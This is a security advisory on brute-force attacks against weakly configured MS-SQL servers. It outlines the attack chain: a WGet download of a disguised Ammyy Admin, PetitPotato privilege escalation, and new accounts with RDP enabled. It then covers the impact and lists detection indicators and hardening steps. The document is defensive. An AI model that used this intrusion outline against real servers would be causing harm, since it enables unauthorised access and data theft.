This threat involves a series of attacks targeting poorly managed Microsoft SQL (MS-SQL) servers. Attackers exploit weak security configurations, primarily through brute force and dictionary attacks against MS-SQL authentication, to gain initial access. Once access is obtained, they execute commands to gather system information (technique T1082) and use WGet to download and install additional malware components. The primary malware installed is an outdated version (v3.10) of Ammyy Admin, a legitimate remote control tool, disguised as 'mscorsvw.exe' alongside its configuration file 'settings3.bin'. Additionally, the attackers deploy PetitPotato (p.ax), a known privilege escalation tool that exploits Windows token impersonation vulnerabilities to elevate privileges (technique T1068). With escalated privileges, the attackers create new user accounts and enable Remote Desktop Protocol (RDP) services to maintain persistent remote access. The attack chain leverages multiple MITRE ATT&CK techniques including brute force (T1110), remote service exploitation (T1021), command execution (T1059), and persistence via new user creation (T1136). The use of an outdated Ammyy Admin version suggests reliance on known vulnerabilities or lack of detection signatures. The attackers exploit common misconfigurations such as weak passwords and unpatched MS-SQL servers, emphasizing the importance of proper server hardening. No specific affected product versions are listed, indicating the attack targets any MS-SQL server with weak security. There are no known exploits in the wild beyond these observed attacks, and no CVSS score is assigned. The threat is rated medium severity by the source, reflecting moderate impact potential and exploitation complexity.

For European organizations, the impact of this threat can be significant, especially for entities relying on MS-SQL servers for critical business operations. Successful exploitation can lead to unauthorized remote control of servers, enabling attackers to exfiltrate sensitive data, manipulate databases, or use the compromised infrastructure as a foothold for lateral movement within the network. The installation of Ammyy Admin allows persistent remote access, increasing the risk of prolonged undetected compromise. Privilege escalation via PetitPotato further exacerbates the threat by granting attackers administrative control, which can lead to disabling security controls, deploying ransomware, or establishing backdoors. Organizations in sectors such as finance, healthcare, manufacturing, and government are particularly at risk due to their reliance on MS-SQL databases and the sensitivity of stored data. Additionally, enabling RDP services and adding new users can facilitate further attacks or insider threats. The medium severity rating reflects that while the attack requires some initial misconfiguration (weak passwords, unpatched servers), the consequences can be severe if exploited. The threat also poses reputational and regulatory risks under GDPR if personal data is compromised. Given the use of legitimate tools like Ammyy Admin, detection may be challenging, increasing dwell time and potential damage.

To mitigate this threat effectively, European organizations should implement the following specific measures beyond generic advice: 1) Enforce strong, complex passwords and implement account lockout policies on MS-SQL servers to prevent brute force and dictionary attacks. 2) Disable or restrict remote access protocols such as RDP unless absolutely necessary, and enforce network-level authentication and multi-factor authentication (MFA) for remote connections. 3) Regularly audit MS-SQL server configurations and patch all known vulnerabilities promptly, including underlying Windows OS patches that address privilege escalation vectors exploited by PetitPotato. 4) Monitor for unusual process executions and network connections, specifically looking for the presence of 'mscorsvw.exe' in unexpected contexts and the download of files via WGet or similar tools. 5) Implement application whitelisting to prevent unauthorized execution of tools like Ammyy Admin and PetitPotato. 6) Conduct regular user account reviews to detect unauthorized additions and disable unused accounts. 7) Employ network segmentation to isolate database servers from general user networks and limit lateral movement. 8) Use endpoint detection and response (EDR) solutions capable of detecting privilege escalation and remote control tool behaviors. 9) Educate administrators on the risks of using outdated remote control software versions and encourage the use of secure, updated alternatives. 10) Establish comprehensive logging and alerting for MS-SQL authentication failures and privilege escalation attempts to enable rapid incident response.